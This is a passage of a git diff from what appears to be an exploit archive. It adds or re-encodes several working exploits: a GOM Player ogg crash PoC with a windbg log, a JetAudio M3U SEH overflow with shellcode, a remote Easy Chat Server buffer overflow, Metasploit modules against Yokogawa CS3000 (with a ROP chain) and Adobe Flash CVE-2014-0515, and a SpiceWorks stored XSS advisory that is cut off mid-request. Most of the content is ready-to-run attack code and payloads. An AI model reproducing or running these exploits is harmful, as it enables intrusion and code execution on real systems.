x64\xA9\x9B\x60\xA1\x7D\xF5\x4B\xC6\xDB\x05\x8C\xFC\xA5\xAC\x7B\x3C\x7D\xBE\xBE\xC9\x5B\x91\x71\xB3\x24\xBB\x8D\xEF\x3C\xEA\xDD\x47\x9E\xC8\xC9\x30\xF0\x9B\xA3\xBD\x16\x91\x48\xA2\x42\x4C\x6F\x42\xF5\x99\xCA\xA2\x12\xBA\xEE\xAE\x7D\x5E\x53\x9F\xF5\x01\x93\xC3\xE0\xEB\xA0\x15\x98\x33\x6A\xDD\x4F\x67\x67\x53\x00\x01\x00\x55\x00\x00\x00\x00\x00\x00\x55\x0B\x00\x00\x04\x00\x00\x00\x16\x3D\x35\xFD\x28\x46\xFF\x4C\xFF\x52\xFF\x4E\xFF\x6A\xFF\x53\x46\x51\x54\x53\x56\x52\x51\x58\x51\x52\x48\x44\x56\x54\x56\x56\x53\x58\x53\x51\x51\x56\x52\x57\x57\x55\x52\x57\x54\x3B\x0B\x66\x98\xFB\xBD\xAF\x64\x85\xD6\x55\x54\xFE\x7B\x37\xE0\x9C\x80\xCF\x62\x57\xBC\x6B\x61\xB2\xCC\xFF\xCA\xD2\x2F\x63\xD7\x28\x5C\x9E\xC7\x77\xA1\xDA\xBC\x9F\xFD\x42\x13\x9B\xA7\xA1\xA6\xAA\xA2\xE6\x49\xC5\x14\x11\x51\xC1\x90\xEF\x31\xB8\xFB\x58\x50\x70\x00\x10\x48\x00\x02\x3E\xCC\x65\xB1\x06\xFD\xCF\x81\x74\x33\x24\x0D" + +outfile = file("poc.ogg", 'wb') + +outfile.write(data) + +outfile.close() + +print "Created Poc" + +''' +--------------------------------------------------------------------------------------- +windbg result: + +Microsoft (R) Windows Debugger Version 6.2.9200.16384 X86 +Copyright (c) Microsoft Corporation. All rights reserved. + +*** wait with pending attach +Symbol search path is: *** Invalid *** +**************************************************************************** +* Symbol loading may be unreliable without a symbol search path. * +* Use .symfix to have the debugger choose a symbol path. * +* After setting your symbol path, use .reload to refresh symbol locations. * +**************************************************************************** +Executable search path is: +ModLoad: 00400000 00c32000 C:\Program Files\GRETECH\GomPlayer\GOM.EXE +ModLoad: 7c900000 7c9af000 C:\WINDOWS\system32\ntdll.dll +ModLoad: 7c800000 7c8f6000 C:\WINDOWS\system32\kernel32.dll +ModLoad: 76b40000 76b6d000 C:\WINDOWS\system32\WINMM.dll +ModLoad: 77dd0000 77e6b000 C:\WINDOWS\system32\ADVAPI32.dll +ModLoad: 77e70000 77f02000 C:\WINDOWS\system32\RPCRT4.dll +ModLoad: 77fe0000 77ff1000 C:\WINDOWS\system32\Secur32.dll +ModLoad: 77f10000 77f59000 C:\WINDOWS\system32\GDI32.dll +ModLoad: 7e410000 7e4a1000 C:\WINDOWS\system32\USER32.dll +ModLoad: 76380000 76385000 C:\WINDOWS\system32\MSIMG32.dll +ModLoad: 763b0000 763f9000 C:\WINDOWS\system32\COMDLG32.dll +ModLoad: 773d0000 774d3000 +C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\COMCTL32.dll +ModLoad: 77c10000 77c68000 C:\WINDOWS\system32\msvcrt.dll +ModLoad: 77f60000 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll +ModLoad: 7c9c0000 7d1d7000 C:\WINDOWS\system32\SHELL32.dll +ModLoad: 73000000 73026000 C:\WINDOWS\system32\WINSPOOL.DRV +ModLoad: 5ad70000 5ada8000 C:\WINDOWS\system32\UxTheme.dll +ModLoad: 774e0000 7761d000 C:\WINDOWS\system32\ole32.dll +ModLoad: 77120000 771ab000 C:\WINDOWS\system32\OLEAUT32.dll +ModLoad: 7df70000 7df92000 C:\WINDOWS\system32\oledlg.dll +ModLoad: 7e1e0000 7e282000 C:\WINDOWS\system32\urlmon.dll +ModLoad: 77c00000 77c08000 C:\WINDOWS\system32\VERSION.dll +ModLoad: 77920000 77a13000 C:\WINDOWS\system32\SETUPAPI.dll +ModLoad: 71ab0000 71ac7000 C:\WINDOWS\system32\WS2_32.dll +ModLoad: 71aa0000 71aa8000 C:\WINDOWS\system32\WS2HELP.dll +ModLoad: 76390000 763ad000 C:\WINDOWS\system32\IMM32.dll +ModLoad: 76c30000 76c5e000 C:\WINDOWS\system32\WINTRUST.dll +ModLoad: 77a80000 77b15000 C:\WINDOWS\system32\CRYPT32.dll +ModLoad: 77b20000 77b32000 C:\WINDOWS\system32\MSASN1.dll +ModLoad: 76c90000 76cb8000 C:\WINDOWS\system32\IMAGEHLP.dll +ModLoad: 771b0000 7725a000 C:\WINDOWS\system32\WININET.dll +ModLoad: 76d60000 76d79000 C:\WINDOWS\system32\IPHLPAPI.DLL +ModLoad: 74c80000 74cac000 C:\WINDOWS\system32\OLEACC.dll +ModLoad: 76080000 760e5000 C:\WINDOWS\system32\MSVCP60.dll +ModLoad: 629c0000 629c9000 C:\WINDOWS\system32\LPK.DLL +ModLoad: 74d90000 74dfb000 C:\WINDOWS\system32\USP10.dll +ModLoad: 74720000 7476c000 C:\WINDOWS\system32\MSCTF.dll +ModLoad: 76ee0000 76f1c000 C:\WINDOWS\system32\RASAPI32.DLL +ModLoad: 76e90000 76ea2000 C:\WINDOWS\system32\rasman.dll +ModLoad: 5b860000 5b8b5000 C:\WINDOWS\system32\NETAPI32.dll +ModLoad: 76eb0000 76edf000 C:\WINDOWS\system32\TAPI32.dll +ModLoad: 76e80000 76e8e000 C:\WINDOWS\system32\rtutils.dll +ModLoad: 722b0000 722b5000 C:\WINDOWS\system32\sensapi.dll +ModLoad: 769c0000 76a74000 C:\WINDOWS\system32\USERENV.dll +ModLoad: 68000000 68036000 C:\WINDOWS\system32\rsaenh.dll +ModLoad: 015a0000 01865000 C:\WINDOWS\system32\xpsp2res.dll +ModLoad: 75e60000 75e73000 C:\WINDOWS\system32\cryptnet.dll +ModLoad: 76bf0000 76bfb000 C:\WINDOWS\system32\PSAPI.DLL +ModLoad: 4d4f0000 4d549000 C:\WINDOWS\system32\WINHTTP.dll +ModLoad: 76f60000 76f8c000 C:\WINDOWS\system32\WLDAP32.dll +ModLoad: 76fd0000 7704f000 C:\WINDOWS\system32\CLBCATQ.DLL +ModLoad: 77050000 77115000 C:\WINDOWS\system32\COMRes.dll +ModLoad: 755c0000 755ee000 C:\WINDOWS\system32\msctfime.ime +ModLoad: 10000000 1006a000 C:\Program +Files\GRETECH\GomPlayer\GomTVStrm.dll +ModLoad: 71ad0000 71ad9000 C:\WINDOWS\system32\wsock32.dll +ModLoad: 767f0000 76817000 C:\WINDOWS\system32\schannel.dll +ModLoad: 71a50000 71a8f000 C:\WINDOWS\System32\mswsock.dll +ModLoad: 76f20000 76f47000 C:\WINDOWS\system32\DNSAPI.dll +ModLoad: 72d20000 72d29000 C:\WINDOWS\system32\wdmaud.drv +ModLoad: 72d10000 72d18000 C:\WINDOWS\system32\msacm32.drv +ModLoad: 77be0000 77bf5000 C:\WINDOWS\system32\MSACM32.dll +ModLoad: 77bd0000 77bd7000 C:\WINDOWS\system32\midimap.dll +ModLoad: 4ec50000 4edf6000 +C:\WINDOWS\WinSxS\x86_Microsoft.Windows.GdiPlus_6595b64144ccf1df_1.0.2600.5512_x-ww_dfb54e0c\gdiplus.dll +ModLoad: 02440000 025cd000 C:\WINDOWS\system32\macromed\flash\flash.ocx +ModLoad: 76fb0000 76fb8000 C:\WINDOWS\System32\winrnr.dll +ModLoad: 76fc0000 76fc6000 C:\WINDOWS\system32\rasadhlp.dll +ModLoad: 7e290000 7e401000 C:\WINDOWS\system32\shdocvw.dll +ModLoad: 754d0000 75550000 C:\WINDOWS\system32\CRYPTUI.dll +ModLoad: 71800000 71888000 C:\WINDOWS\system32\shdoclc.dll +ModLoad: 75cf0000 75d81000 C:\WINDOWS\system32\mlang.dll +ModLoad: 662b0000 66308000 C:\WINDOWS\system32\hnetcfg.dll +ModLoad: 71a90000 71a98000 C:\WINDOWS\System32\wshtcpip.dll +ModLoad: 02e00000 02e08000 C:\Program Files\Internet Download +Manager\idmmkb.dll +ModLoad: 76980000 76988000 C:\WINDOWS\system32\LINKINFO.dll +ModLoad: 76990000 769b5000 C:\WINDOWS\system32\ntshrui.dll +ModLoad: 76b20000 76b31000 C:\WINDOWS\system32\ATL.DLL +ModLoad: 74810000 7497d000 C:\WINDOWS\system32\quartz.dll +ModLoad: 03f20000 03f50000 C:\Program Files\GRETECH\GomPlayer\grfu.ax +ModLoad: 4fdd0000 4ff76000 C:\WINDOWS\system32\d3d9.dll +ModLoad: 6d990000 6d996000 C:\WINDOWS\system32\d3d8thk.dll +ModLoad: 73760000 737ab000 C:\WINDOWS\system32\DDRAW.dll +ModLoad: 73bc0000 73bc6000 C:\WINDOWS\system32\DCIMAN32.dll +ModLoad: 471b0000 47211000 C:\WINDOWS\system32\qdvd.dll +ModLoad: 04060000 04338000 C:\Program Files\GRETECH\GomPlayer\gvf.ax +ModLoad: 6eac0000 6eb26000 C:\Program +Files\GRETECH\GomPlayer\avutil-gp-52.dll +ModLoad: 62e40000 63a37000 C:\Program +Files\GRETECH\GomPlayer\avcodec-gp-55.dll +ModLoad: 6dd80000 6ddf2000 C:\Program +Files\GRETECH\GomPlayer\swscale-gp-2.dll +ModLoad: 67680000 677a0000 C:\Program +Files\GRETECH\GomPlayer\avformat-gp-55.dll +ModLoad: 04350000 043a7000 C:\Program Files\GRETECH\GomPlayer\tbb.dll +ModLoad: 043c0000 04543000 C:\Program Files\GRETECH\GomPlayer\gaf.ax +ModLoad: 04670000 046af000 C:\Program +Files\GRETECH\GomPlayer\MediaSource.ax +(ef0.890): Access violation - code c0000005 (!!! second chance !!!) +*** ERROR: Symbol file could not be found. Defaulted to export symbols for +C:\WINDOWS\system32\ntdll.dll - +*** ERROR: Symbol file could not be found. Defaulted to export symbols for +C:\Program Files\GRETECH\GomPlayer\gaf.ax - +eax=00002000 ebx=00000001 ecx=3f7fd7f2 edx=00000000 esi=0456422c +edi=04564008 +eip=043e577f esp=0012d640 ebp=0012d654 iopl=0 nv up ei ng nz ac pe +cy +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 +efl=00200297 +gaf!DllUnregisterServer+0x22adf: +043e577f 8b4108 mov eax,dword ptr [ecx+8] +ds:0023:3f7fd7fa=???????? +0:000> .load winext/msec.dll +0:000> !exploitable + +!exploitable 1.6.0.0 +Exploitability Classification: PROBABLY_EXPLOITABLE +Recommended Bug Title: Probably Exploitable - Data from Faulting Address +controls Code Flow starting at gaf!DllUnregisterServer+0x0000000000022adf +(Hash=0xc4cf042d.0x370f0914) + +The data from the faulting address is later used as the target for a branch.''' \ No newline at end of file diff --git a/platforms/windows/local/9375.py b/platforms/windows/local/9375.py index 6d94c9924..33966b18c 100755 --- a/platforms/windows/local/9375.py +++ b/platforms/windows/local/9375.py @@ -1,50 +1,50 @@ -#!/usr/bin/env python - -########################################################################################### -# -# JetAudio 7.1.9.4030 Universal Stack Overflow Exploit (SEH) -# Coded By: Dr_IDE -# Found By: HACK4LOVE -# Tested on Windows XP SP2 -# -############################################################################################ - -# windows/exec - 303 bytes -# http://www.metasploit.com -# Encoder: x86/alpha_upper -# EXITFUNC=seh, CMD=calc -sc = ("\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49" -"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" -"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" -"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" -"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a" -"\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47" -"\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x45\x51\x4a\x4f\x4c" -"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a" -"\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46" -"\x51\x49\x50\x4c\x59\x4e\x4c\x4d\x54\x49\x50\x42\x54\x45" -"\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4c" -"\x34\x47\x4b\x50\x54\x47\x54\x45\x54\x43\x45\x4b\x55\x4c" -"\x4b\x51\x4f\x47\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44" -"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c" -"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4c\x49\x51\x4c\x46" -"\x44\x44\x44\x48\x43\x51\x4f\x50\x31\x4a\x56\x45\x30\x50" -"\x56\x42\x44\x4c\x4b\x51\x56\x50\x30\x4c\x4b\x51\x50\x44" -"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45" -"\x58\x4b\x39\x4a\x58\x4d\x53\x49\x50\x42\x4a\x50\x50\x43" -"\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x45\x38\x4a\x38\x4b" -"\x4e\x4c\x4a\x44\x4e\x50\x57\x4b\x4f\x4d\x37\x42\x43\x43" -"\x51\x42\x4c\x42\x43\x43\x30\x41\x41"); - - -jump = ("\xEB\x06\x90\x90"); -retn = ("\x45\x10\x22\x01"); -nops = ("\x90" * 16); -buff = ("http://" + "\x41" * 1017); -junk = ("\x45" * (876 - len(sc))); - -f1 = open('Dr_IDE-JetAudio.M3U','w'); -f1.write(buff + jump + retn + nops + sc + junk); -f1.close(); - -# milw0rm.com [2009-08-06] +#!/usr/bin/env python + +########################################################################################### +# +# JetAudio 7.1.9.4030 Universal Stack Overflow Exploit (SEH) +# Coded By: Dr_IDE +# Found By: HACK4LOVE +# Tested on Windows XP SP2 +# +############################################################################################ + +# windows/exec - 303 bytes +# http://www.metasploit.com +# Encoder: x86/alpha_upper +# EXITFUNC=seh, CMD=calc +sc = ("\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49" +"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" +"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" +"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" +"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a" +"\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47" +"\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x45\x51\x4a\x4f\x4c" +"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a" +"\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46" +"\x51\x49\x50\x4c\x59\x4e\x4c\x4d\x54\x49\x50\x42\x54\x45" +"\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4c" +"\x34\x47\x4b\x50\x54\x47\x54\x45\x54\x43\x45\x4b\x55\x4c" +"\x4b\x51\x4f\x47\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44" +"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c" +"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4c\x49\x51\x4c\x46" +"\x44\x44\x44\x48\x43\x51\x4f\x50\x31\x4a\x56\x45\x30\x50" +"\x56\x42\x44\x4c\x4b\x51\x56\x50\x30\x4c\x4b\x51\x50\x44" +"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45" +"\x58\x4b\x39\x4a\x58\x4d\x53\x49\x50\x42\x4a\x50\x50\x43" +"\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x45\x38\x4a\x38\x4b" +"\x4e\x4c\x4a\x44\x4e\x50\x57\x4b\x4f\x4d\x37\x42\x43\x43" +"\x51\x42\x4c\x42\x43\x43\x30\x41\x41"); + + +jump = ("\xEB\x06\x90\x90"); +retn = ("\x45\x10\x22\x01"); +nops = ("\x90" * 16); +buff = ("http://" + "\x41" * 1017); +junk = ("\x45" * (876 - len(sc))); + +f1 = open('Dr_IDE-JetAudio.M3U','w'); +f1.write(buff + jump + retn + nops + sc + junk); +f1.close(); + +# milw0rm.com [2009-08-06] diff --git a/platforms/windows/remote/33326.py b/platforms/windows/remote/33326.py new file mode 100755 index 000000000..ff6265284 --- /dev/null +++ b/platforms/windows/remote/33326.py @@ -0,0 +1,55 @@ +## Exploit-DB Note: Must install to 'C:\Program Files\EFS Software\Easy Chat Server' + + +# Exploit Title: Easy Chat Server 3.1 stack buffer overflow +# Date: 9 May 2014 +# Exploit Author: superkojiman - http://www.techorganic.com +# Vendor Homepage: http://www.echatserver.com/ +# Software Link: http://www.echatserver.com/ +# Version: 3.1 +# Tested on: Windows 7 Enterprise SP1, English +# +# Description: +# A buffer overflow is triggered when when passing a long username. + + +import socket +import struct + +# calc shellcode from https://code.google.com/p/win-exec-calc-shellcode/ +# msfencode -b "\x00\x20" -i w32-exec-calc-shellcode.bin +# [*] x86/shikata_ga_nai succeeded with size 101 (iteration=1) +shellcode = ( +"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" + +"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" + +"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" + +"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" + +"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" + +"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" + +"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" + +"\x1c\x39\xbd" +) + +# SEH overwritten at offset 207 when Easy Chat Server is +# installed in C:\Program Files\EFS Software\Easy Chat Server +payload = "A"*203 +payload += "\xeb\x06\x90\x90" # short jmp to shellcode +payload += "\x1e\x0e\x01\x10" # pop/pop/ret @ 0x10010E1E SSLEAY32.DLL +payload += "\x81\xc4\xd8\xfe\xff\xff" # add esp,-128 +payload += shellcode # calc.exe +payload += "D"*193 + +buf = ( +"GET /chat.ghp?username=" + payload + "&password=&room=1&sex=1 HTTP/1.1\r\n" +"User-Agent: Mozilla/4.0\r\n" +"Host: 192.168.1.136:80\r\n" +"Accept-Language: en-us\r\n" +"Accept-Encoding: gzip, deflate\r\n" +"Referer: http://192.168.1.136\r\n" +"Connection: Keep-Alive\r\n\r\n" +) + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect(("192.168.123.131", 80)) +s.send(buf) +print s.recv(1024) diff --git a/platforms/windows/remote/33331.rb b/platforms/windows/remote/33331.rb new file mode 100755 index 000000000..dc031e26c --- /dev/null +++ b/platforms/windows/remote/33331.rb @@ -0,0 +1,160 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Yokogawa CS3000 BKESimmgr.exe Buffer Overflow', + 'Description' => %q{ + This module exploits an stack based buffer overflow on Yokogawa CS3000. The vulnerability + exists in the BKESimmgr.exe service when handling specially crafted packets, due to an + insecure usage of memcpy, using attacker controlled data as the size count. This module + has been tested successfully in Yokogawa CS3000 R3.08.50 over Windows XP SP3 and Windows + 2003 SP2. + }, + 'Author' => + [ + 'juan vazquez', + 'Redsadic ' + ], + 'References' => + [ + ['CVE', '2014-0782'], + ['URL', 'https://community.rapid7.com/community/metasploit/blog/2014/05/09/r7-2013-192-disclosure-yokogawa-centum-cs-3000-vulnerabilities'], + ['URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf'] + ], + 'Payload' => + { + 'Space' => 340, + 'DisableNops' => true, + 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 + }, + 'Platform' => 'win', + 'Targets' => + [ + [ + 'Yokogawa Centum CS3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]', + { + 'Ret' => 0x61d1274f, # 0x61d1274f # ADD ESP,10 # RETN # libbkebatchepa.dll + 'Offset' => 64, + 'FakeArgument1' => 0x0040E65C, # ptr to .data on BKESimmgr.exe + 'FakeArgument2' => 0x0040EB90 # ptr to .data on BKESimmgr.exe + } + ], + ], + 'DisclosureDate' => 'Mar 10 2014', + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(34205) + ], self.class) + end + + def check + data = create_pkt(rand_text_alpha(4)) + + res = send_pkt(data) + + if res && res.length == 10 + simmgr_res = parse_response(res) + + if valid_response?(simmgr_res) + check_code = Exploit::CheckCode::Appears + else + check_code = Exploit::CheckCode::Safe + end + else + check_code = Exploit::CheckCode::Safe + end + + check_code + end + + def exploit + bof = rand_text(target['Offset']) + bof << [target.ret].pack("V") + bof << [target['FakeArgument1']].pack("V") + bof << [target['FakeArgument2']].pack("V") + bof << rand_text(16) # padding (corrupted bytes) + bof << create_rop_chain + bof << payload.encoded + + data = [0x1].pack("N") # Sub-operation id, <= 0x8 in order to pass the check at sub_4090B0 + data << [bof.length].pack("n") + data << bof + + pkt = create_pkt(data) + + print_status("Trying target #{target.name}, sending #{pkt.length} bytes...") + connect + sock.put(pkt) + disconnect + end + + def create_rop_chain + # rop chain generated with mona.py - www.corelan.be + rop_gadgets = + [ + 0x004047ca, # POP ECX # RETN [BKESimmgr.exe] + 0x610e3024, # ptr to &VirtualAlloc() [IAT libbkfmtvrecinfo.dll] + 0x61232d60, # MOV EAX,DWORD PTR DS:[ECX] # RETN [LibBKESysVWinList.dll] + 0x61d19e6a, # XCHG EAX,ESI # RETN [libbkebatchepa.dll] + 0x619436d3, # POP EBP # RETN [libbkeeda.dll] + 0x61615424, # & push esp # ret [libbkeldc.dll] + 0x61e56c8e, # POP EBX # RETN [LibBKCCommon.dll] + 0x00000001, # 0x00000001-> ebx + 0x61910021, # POP EDX # ADD AL,0 # MOV EAX,6191002A # RETN [libbkeeda.dll] + 0x00001000, # 0x00001000-> edx + 0x0040765a, # POP ECX # RETN [BKESimmgr.exe] + 0x00000040, # 0x00000040-> ecx + 0x6191aaab, # POP EDI # RETN [libbkeeda.dll] + 0x61e58e04, # RETN (ROP NOP) [LibBKCCommon.dll] + 0x00405ffa, # POP EAX # RETN [BKESimmgr.exe] + 0x90909090, # nop + 0x619532eb # PUSHAD # RETN [libbkeeda.dll] + ].pack("V*") + + rop_gadgets + end + + def create_pkt(data) + pkt = [0x01].pack("N") # Operation Identifier + pkt << [data.length].pack("n") # length + pkt << data # Fake packet + + pkt + end + + def send_pkt(data) + connect + sock.put(data) + res = sock.get_once + disconnect + + res + end + + def parse_response(data) + data.unpack("NnN") + end + + def valid_response?(data) + valid = false + + if data && data[0] == 1 && data[1] == 4 && data[1] == 4 && data[2] == 5 + valid = true + end + + valid + end + +end \ No newline at end of file diff --git a/platforms/windows/remote/33333.rb b/platforms/windows/remote/33333.rb new file mode 100755 index 000000000..70d689f9c --- /dev/null +++ b/platforms/windows/remote/33333.rb @@ -0,0 +1,129 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::BrowserExploitServer + + def initialize(info={}) + super(update_info(info, + 'Name' => "Adobe Flash Player Shader Buffer Overflow", + 'Description' => %q{ + This module exploits a buffer overflow vulnerability in Adobe Flash Player. The + vulnerability occurs in the flash.Display.Shader class, when setting specially + crafted data as its bytecode, as exploited in the wild in April 2014. This module + has been tested successfully on IE 6 to IE 10 with Flash 11 and Flash 12 over + Windows XP SP3, Windows 7 SP1 and Windows 8. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Unknown', # Vulnerability discovery and exploit in the wild + 'juan vazquez' # msf module + ], + 'References' => + [ + ['CVE', '2014-0515'], + ['BID', '67092'], + ['URL', 'http://helpx.adobe.com/security/products/flash-player/apsb14-13.html'], + ['URL', 'http://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks'], + ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-cve-2014-0515-the-recent-flash-zero-day/' ] + ], + 'Payload' => + { + 'Space' => 2000, + 'DisableNops' => true, + 'PrependEncoder' => stack_adjust + }, + 'DefaultOptions' => + { + 'InitialAutoRunScript' => 'migrate -f', + 'Retries' => false, + 'EXITFUNC' => "thread" + }, + 'Platform' => 'win', + 'BrowserRequirements' => + { + :source => /script|headers/i, + :clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}", + :method => "LoadMovie", + :os_name => Msf::OperatingSystems::WINDOWS, + :ua_name => Msf::HttpClients::IE, + :flash => lambda { |ver| ver =~ /^11\./ || ver =~ /^12\./ || (ver =~ /^13\./ && ver <= '13.0.0.182') } + }, + 'Targets' => + [ + [ 'Automatic', {} ] + ], + 'Privileged' => false, + 'DisclosureDate' => "Apr 28 2014", + 'DefaultTarget' => 0)) + end + + def exploit + @swf = create_swf + super + end + + def stack_adjust + adjust = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18 # get teb + adjust << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit + adjust << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit + adjust << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset + + adjust + end + + def on_request_exploit(cli, request, target_info) + print_status("Request: #{request.uri}") + + if request.uri =~ /\.swf$/ + print_status("Sending SWF...") + send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'}) + return + end + + print_status("Sending HTML...") + tag = retrieve_tag(cli, request) + profile = get_profile(tag) + profile[:tried] = false unless profile.nil? # to allow request the swf + send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) + end + + def exploit_template(cli, target_info) + swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" + flash_payload = "" + get_payload(cli,target_info).unpack("V*").each do |i| + flash_payload << "0x#{i.to_s(16)}," + end + flash_payload.gsub!(/,$/, "") + + + html_template = %Q| + + + + + + + + + + | + + return html_template, binding() + end + + def create_swf + path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2014-0515", "Graph.swf" ) + swf = ::File.open(path, 'rb') { |f| swf = f.read } + + swf + end + +end \ No newline at end of file diff --git a/platforms/windows/webapps/33330.txt b/platforms/windows/webapps/33330.txt new file mode 100755 index 000000000..3ff6db7bb --- /dev/null +++ b/platforms/windows/webapps/33330.txt @@ -0,0 +1,103 @@ +# Exploit Title: Multiple Stored XSS vulnerabilities in SpiceWorks Ticketing system +# Date: 12/05/2014 +# Exploit author: Dolev Farhi @f1nhack +# Vendor homepage: http://spiceworks.com +# Software Link: http://download.spiceworks.com/Spiceworks.exe +# Version: 7.2.00174 (Latest) +# Tested on: Kali Linux +# Vendor alerted: 12/05/2014 + +1. About the application: +======================= + SpiceWorks is an IT ticketing system deployed in many companies around the world + + +2. Vulnerability Description: +========================= +Multiple stored XSS were found in SpiceWorks system, allowing an attacker to create a SpiceWorks IT ticket with malicious code. +once an admin attemps to login to the system dashboard to view open tickets, the code executes and the attacker +could potentially steal the admin's cookies. + + +3. PoC Videos: +=============== +https://www.youtube.com/watch?v=lG5Y_okTaos&feature=youtu.be +https://www.youtube.com/watch?v=efIyZRTDS9c + +Steps to reproduce: + i. Create a ticket in user_portal with the title + ii. submit. + iii. login as admin user and navigate to the open tickets, the XSS appears. + +4. Session Logs: +<-> Vulnerability 1 <-> + +
+
+ + + + + +<-> Vulnerability 2 <-> + +POST /settings/advanced/save_system_setting?name=pdf_header_color HTTP/1.1 + +Host: ip.add.re.ss + +User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0 + +Accept: text/javascript, text/html, application/xml, text/xml, */* + +Accept-Language: en-US,en;q=0.5 + +Accept-Encoding: gzip, deflate + +X-Requested-With: XMLHttpRequest + +X-Prototype-Version: 1.6.1 + +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + +Referer: http://192.168.186.31/settings/advanced?more_settings=true + +Content-Length: 177 + +Cookie: user_id=BAgw--XXXX6231342123XXXX234213515; portal_user_email=BAhJIhV1c2VyMTk4N0BnbXguY29tBjoGRVQ%3D--f9cd3afeeb246cb35d3670914c45c30e427b76f7; __utma=1.399722362.1399878889.1399878889.1399878889.1; __utmb=1.107.0.1399879583954; __utmz=1.1399878889.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 